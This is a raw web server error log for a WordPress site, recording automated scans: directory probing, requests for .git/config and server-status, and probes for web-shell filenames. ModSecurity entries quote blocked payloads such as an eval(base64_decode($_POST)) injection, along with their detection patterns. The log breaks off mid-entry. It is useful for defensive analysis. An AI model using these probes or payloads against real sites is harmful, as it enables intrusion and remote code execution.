(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Tue Oct 22 18:42:02.528621 2024] [autoindex:error] [pid 29283:tid 140445849982720] [client 193.37.32.221:56362] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Tue Oct 22 18:42:20.390129 2024] [autoindex:error] [pid 29281:tid 140445997336320] [client 193.37.32.221:56386] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Tue Oct 22 18:42:23.315351 2024] [autoindex:error] [pid 3959:tid 140445808019200] [client 193.37.32.221:56392] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Tue Oct 22 18:42:24.922488 2024] [autoindex:error] [pid 29522:tid 140445774448384] [client 193.37.32.221:56396] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Tue Oct 22 18:42:30.730095 2024] [autoindex:error] [pid 29283:tid 140445816411904] [client 193.37.32.221:56406] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 22 18:42:50.722751 2024] [autoindex:error] [pid 3959:tid 140445849982720] [client 193.37.32.221:56448] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php 2024/10/22 18:43:15 [error] 29245#29245: *607831 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 193.37.32.221, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Tue Oct 22 18:43:21.301975 2024] [autoindex:error] [pid 29283:tid 140445891946240] [client 193.37.32.221:56500] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Tue Oct 22 18:43:24.707958 2024] [autoindex:error] [pid 29283:tid 140445824804608] [client 193.37.32.221:56508] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Oct 22 18:43:36.542676 2024] [autoindex:error] [pid 3959:tid 140446005729024] [client 193.37.32.221:56526] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Tue Oct 22 18:43:42.984384 2024] [:error] [pid 3866:tid 140445841590016] [client 193.37.32.221:56536] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Oct 22 18:44:00.940486 2024] [autoindex:error] [pid 29283:tid 140445849982720] [client 193.37.32.221:56568] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Tue Oct 22 18:44:02.533197 2024] [autoindex:error] [pid 3959:tid 140445875160832] [client 193.37.32.221:56572] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Tue Oct 22 18:45:22.815950 2024] [:error] [pid 29281:tid 140445749270272] [client 193.37.32.221:56694] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Oct 22 18:45:26.899881 2024] [autoindex:error] [pid 3705:tid 140445841590016] [client 193.37.32.221:56704] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Tue Oct 22 18:45:50.699581 2024] [:error] [pid 29283:tid 140445841590016] [client 193.37.32.221:56740] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Oct 22 18:46:03.124716 2024] [autoindex:error] [pid 29283:tid 140445791233792] [client 193.37.32.221:56762] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Tue Oct 22 18:46:03.429855 2024] [:error] [pid 3755:tid 140445799626496] [client 193.37.32.221:56764] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Oct 22 18:46:09.650688 2024] [:error] [pid 3754:tid 140445891946240] [client 193.37.32.221:56774] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Tue Oct 22 18:46:09.950331 2024] [:error] [pid 29281:tid 140445875160832] [client 193.37.32.221:56776] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Tue Oct 22 18:46:18.285946 2024] [:error] [pid 29283:tid 140445980550912] [client 193.37.32.221:56788] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Oct 22 18:46:46.200901 2024] [autoindex:error] [pid 29283:tid 140445883553536] [client 193.37.32.221:56830] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/22 18:47:04 [error] 29245#29245: *607831 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 193.37.32.221, server: investigacionperu.com, request: "GET /.well-known/pki-validation/?p= HTTP/1.1", host: "investigacionperu.com" [Wed Oct 23 11:47:27.929756 2024] [autoindex:error] [pid 31831:tid 139622348687104] [client 20.213.23.178:47940] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/10/23 21:15:12 [error] 27508#27508: *629725 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/23 21:38:29 [error] 27509#27509: *629821 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/23 23:11:14 [error] 27508#27508: *630774 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/24 01:06:55 [error] 27508#27508: *633246 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/24 02:02:50 [error] 27508#27508: *634239 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Oct 24 06:28:24.699899 2024] [authz_core:error] [pid 32395:tid 139667965929216] [client 206.81.24.227:41128] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/24 06:28:29 [error] 32361#32361: *637157 access forbidden by rule, client: 206.81.24.227, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Oct 24 06:38:21.033230 2024] [autoindex:error] [pid 32395:tid 139668016285440] [client 165.22.214.14:41364] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/24 13:18:52 [error] 32362#32362: *641808 access forbidden by rule, client: 179.43.188.122, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Oct 24 17:52:26.581555 2024] [authz_core:error] [pid 32631:tid 139668190189312] [client 46.101.111.185:52912] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/24 17:52:31 [error] 32362#32362: *644095 access forbidden by rule, client: 46.101.111.185, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Oct 24 22:50:20.543629 2024] [autoindex:error] [pid 32631:tid 139668215367424] [client 143.110.187.135:56840] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 25 03:46:19.491695 2024] [:error] [pid 30493:tid 140214198576896] [client 45.227.254.34:33570] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:x. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:x: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/wp-content.php"] [unique_id "Zxta24HIX8vSpI7hunK5KwAAAEw"] [Fri Oct 25 09:06:10.048545 2024] [autoindex:error] [pid 32460:tid 140214223755008] [client 87.120.113.120:41362] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 25 21:22:45.731738 2024] [authz_core:error] [pid 691:tid 140214190184192] [client 192.46.211.230:35302] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/25 21:22:52 [error] 30358#30358: *669550 access forbidden by rule, client: 192.46.211.230, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Oct 26 05:45:26.213184 2024] [autoindex:error] [pid 31476:tid 139784240424704] [client 4.247.174.32:43648] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Oct 26 06:48:39.545139 2024] [authz_core:error] [pid 31476:tid 139784123045632] [client 207.154.197.113:44624] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/26 06:48:43 [error] 31438#31438: *675879 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/26 15:17:43 [error] 31439#31439: *680722 access forbidden by rule, client: 98.84.25.125, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/26 15:40:11 [error] 31439#31439: *680901 access forbidden by rule, client: 98.84.25.125, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/26 15:50:22 [error] 31439#31439: *680946 access forbidden by rule, client: 98.84.25.125, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/26 16:55:40 [error] 31439#31439: *681589 access forbidden by rule, client: 98.84.25.125, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Oct 26 17:11:30.996095 2024] [autoindex:error] [pid 31690:tid 139784223639296] [client 87.120.113.120:53492] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/26 17:14:17 [error] 31439#31439: *681708 access forbidden by rule, client: 98.84.25.125, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/26 20:35:25 [error] 31438#31438: *683856 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/26 20:44:29 [error] 31438#31438: *683921 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/26 23:55:43 [error] 31439#31439: *685589 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/27 00:39:09 [error] 31439#31439: *686359 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/27 02:30:06 [error] 31438#31438: *689333 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Oct 27 23:35:04.210308 2024] [authz_core:error] [pid 2946:tid 139908492556032] [client 138.197.191.87:53790] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/27 23:35:08 [error] 24995#24995: *697756 access forbidden by rule, client: 138.197.191.87, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Oct 28 08:11:21.560342 2024] [authz_core:error] [pid 24667:tid 140696862279424] [client 139.59.132.8:56632] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/28 08:11:25 [error] 24075#24075: *698576 access forbidden by rule, client: 139.59.132.8, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/28 13:54:55 [error] 24074#24074: *699418 access forbidden by rule, client: 45.148.10.123, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/28 13:56:13 [error] 24074#24074: *699420 access forbidden by rule, client: 45.148.10.123, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/28 18:25:20 [error] 24074#24074: *701342 access forbidden by rule, client: 45.148.10.123, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/28 19:37:22 [error] 24074#24074: *701671 access forbidden by rule, client: 45.148.10.123, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Mon Oct 28 20:02:55.498447 2024] [:error] [pid 24667:tid 140696946206464] [client 62.72.44.67:36896] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Mon Oct 28 20:03:16.201712 2024] [:error] [pid 24105:tid 140696887457536] [client 62.72.44.67:37012] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Mon Oct 28 20:03:16.424292 2024] [:error] [pid 24667:tid 140696887457536] [client 62.72.44.67:37016] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Mon Oct 28 20:03:59.294271 2024] [:error] [pid 24667:tid 140696853886720] [client 62.72.44.67:37274] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Oct 28 20:05:46.388520 2024] [:error] [pid 24667:tid 140696853886720] [client 62.72.44.67:37838] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Mon Oct 28 20:06:12.871552 2024] [:error] [pid 24667:tid 140696946206464] [client 62.72.44.67:37948] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php 2024/10/28 21:47:21 [error] 24074#24074: *703589 access forbidden by rule, client: 45.148.10.206, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Oct 28 22:00:12.009351 2024] [:error] [pid 24104:tid 140697037289216] [client 45.227.254.34:39464] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:xxx. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:xxx: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/uploads/2019/index.php"] [unique_id "ZyBPvACpR3OqmbfUATK54wAAAEI"] 2024/10/28 23:16:37 [error] 24074#24074: *704258 access forbidden by rule, client: 45.148.10.206, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/28 23:21:25 [error] 24075#24075: *704277 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/10/29 00:42:26 [error] 24074#24074: *704838 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/6XB9TkFPLYGEJLl9o2RecdL2g06nFrhQpJMuorOh19Q" failed (2: No such file or directory), client: 23.178.112.107, server: mail.investigacionperu.com, request: "GET /.well-known/acme-challenge/6XB9TkFPLYGEJLl9o2RecdL2g06nFrhQpJMuorOh19Q HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/29 00:42:29 [error] 24074#24074: *705013 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/knDNndgLBoud9l9SNBvJm8-sIFBRqfmMC4Z3wqTkXU8" failed (2: No such file or directory), client: 23.178.112.109, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/knDNndgLBoud9l9SNBvJm8-sIFBRqfmMC4Z3wqTkXU8 HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/29 00:42:30 [error] 24075#24075: *705028 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/8piMgrgHtDFHCd40m7P6R574d6RfafNFQ4TO6hd43PE" failed (2: No such file or directory), client: 23.178.112.219, server: webmail.investigacionperu.com, request: "GET /.well-known/acme-challenge/8piMgrgHtDFHCd40m7P6R574d6RfafNFQ4TO6hd43PE HTTP/1.1", host: "webmail.investigacionperu.com" [Tue Oct 29 00:55:07.608465 2024] [autoindex:error] [pid 491:tid 140696870672128] [client 4.213.60.30:42868] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/10/29 00:56:50 [error] 4188#4188: *705951 access forbidden by rule, client: 45.148.10.206, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/29 04:43:33 [error] 28051#28051: *708427 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Tue Oct 29 17:20:44.515736 2024] [autoindex:error] [pid 28782:tid 140275536078592] [client 165.22.219.5:35710] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Oct 29 20:18:58.406566 2024] [:error] [pid 6540:tid 140275494115072] [client 167.71.218.223:39172] [client 167.71.218.223] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:dd. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: $_POST found within ARGS:dd: eval(base64_decode($_POST['a']));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZyGJgmH91jbfuZPUFbd4EgAAAAw"] 2024/10/30 00:43:09 [error] 6478#6478: *728320 access forbidden by rule, client: 159.89.12.166, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/30 00:43:09 [error] 6479#6479: *728328 access forbidden by rule, client: 178.128.207.138, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/30 00:43:09 [error] 6479#6479: *728353 access forbidden by rule, client: 157.230.19.140, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/10/30 00:43:12 [error] 6478#6478: *728435 access forbidden by rule, client: 165.227.173.41, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/10/30 00:43:12 [error] 6479#6479: *728447 access forbidden by rule, client: 139.59.143.102, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/10/30 00:43:12 [error] 6478#6478: *728450 access forbidden by rule, client: 159.89.12.166, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Oct 30 00:46:02.611457 2024] [authz_core:error] [pid 6542:tid 140275561256704] [client 167.71.81.114:45490] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Oct 30 00:46:04.219265 2024] [authz_core:error] [pid 6677:tid 140275485722368] [client 138.68.86.32:45500] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/30 00:46:06 [error] 6479#6479: *728744 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/10/30 00:46:09 [error] 6478#6478: *728760 access forbidden by rule, client: 138.68.86.32, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Oct 30 01:32:27.504297 2024] [authz_core:error] [pid 6542:tid 140275527685888] [client 207.154.212.47:46410] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/30 01:32:32 [error] 6478#6478: *729390 access forbidden by rule, client: 207.154.212.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Oct 30 03:36:38.033224 2024] [ssl:warn] [pid 23857:tid 140071244744576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 30 03:36:38.263498 2024] [ssl:warn] [pid 23858:tid 140071244744576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 30 